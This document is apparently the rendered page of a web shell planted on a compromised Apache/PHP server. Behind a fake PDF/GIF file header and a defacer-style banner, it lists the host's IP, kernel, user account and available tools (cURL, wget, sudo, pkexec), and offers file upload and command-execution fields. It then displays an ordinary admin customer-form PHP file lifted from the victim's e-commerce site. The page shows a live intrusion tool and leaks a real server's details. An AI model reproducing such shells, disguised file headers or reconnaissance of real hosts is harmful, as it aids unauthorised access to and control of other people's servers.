%PDF-1.7 GIF89;
ANDA PELER
Server IP : 5.161.254.237  /  Your IP : 216.73.216.182
Web Server : Apache
System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
User : stellasp ( 1131)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/stellasp/www/application/views/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/stellasp/www/application/views/admin/customer_form.php
<?php include('header.php'); ?>

<?php echo form_open($this->config->item('admin_folder').'/customers/form/'.$id); ?>
<div class="button_set">
	<input type="submit" value="<?php echo lang('save');?>" />
</div>

<div id="gc_tabs">
	<ul>
		<li><a href="#gc_customer_attributes"><?php echo lang('customer_information');?></a></li>
	</ul>
<div id="gc_customer_attributes">
<div>
<table>
	<tr>
		<td style="padding-right:30px;" rowspan="2">
		
				<table>
					<tr>
						<td><?php echo lang('company');?></td>
						<td>
							<?php
							$data	= array('id'=>'company', 'name'=>'company', 'value'=>set_value('company', $company), 'class'=>'gc_tf1');
							echo form_input($data);
							?>
						</td>
					</tr>
					<tr>
						<td><?php echo lang('firstname');?></td>
						<td><?php
						$data	= array('id'=>'firstname', 'name'=>'firstname', 'value'=>set_value('firstname', $firstname), 'class'=>'gc_tf1');
						echo form_input($data);
						?></td>
					</tr>
					<tr>
						<td><?php echo lang('lastname');?></td>
						<td>
							<?php
							$data	= array('id'=>'lastname', 'name'=>'lastname', 'value'=>set_value('lastname', $lastname), 'class'=>'gc_tf1');
							echo form_input($data);
							?>
						</td>
					</tr>
					<tr>
						<td><?php echo lang('email');?></td>
						<td>
							<?php
							$data	= array('id'=>'email', 'name'=>'email', 'value'=>set_value('email', $email), 'class'=>'gc_tf1');
							echo form_input($data);
							?>
						</td>
					</tr>
					<tr>
						<td><?php echo lang('phone');?></td>
						<td>
							<?php
							$data	= array('id'=>'phone', 'name'=>'phone', 'value'=>set_value('phone', $phone), 'class'=>'gc_tf1');
							echo form_input($data);
							?>
						</td>
					</tr>
					<tr>
						<td><?php echo lang('password');?></td>
						<td>
							<?php
							$data	= array('id'=>'password', 'name'=>'password', 'class'=>'gc_tf1');
							echo form_password($data);
							?>
						</td>
					</tr>
					<tr>
						<td><?php echo lang('confirm');?></td>
						<td>
							<?php
							$data	= array('id'=>'confirm', 'name'=>'confirm', 'class'=>'gc_tf1');
							echo form_password($data);
							?>
						</td>
					</tr>
					<tr>
						<td><?php echo lang('email_subscribed');?></td>
						<td><input type="checkbox" name="email_subscribe" value="1" <?php if((bool)$email_subscribe) { ?> checked="checked" <?php } ?>/></td>
					</tr>
					<tr>
						<td><?php echo lang('active');?></td>
						<td>
							<?php
							$data	= array('id'=>'active', 'name'=>'active', 'value'=>1, 'checked'=>$active);
							echo form_checkbox($data);
							?>
						</td>
					</tr>
					<tr>
					  <td><?php echo lang('group');?></td>
					  <td><?php echo form_dropdown('group_id', $group_list, set_value('group_id',$group_id)); ?></td>
				  </tr>
				</table>
		  </td>
		
	</tr>
</table>
</div>

</div>

</form>

<?php include('footer.php');

Anon7 - 2022
SCDN GOK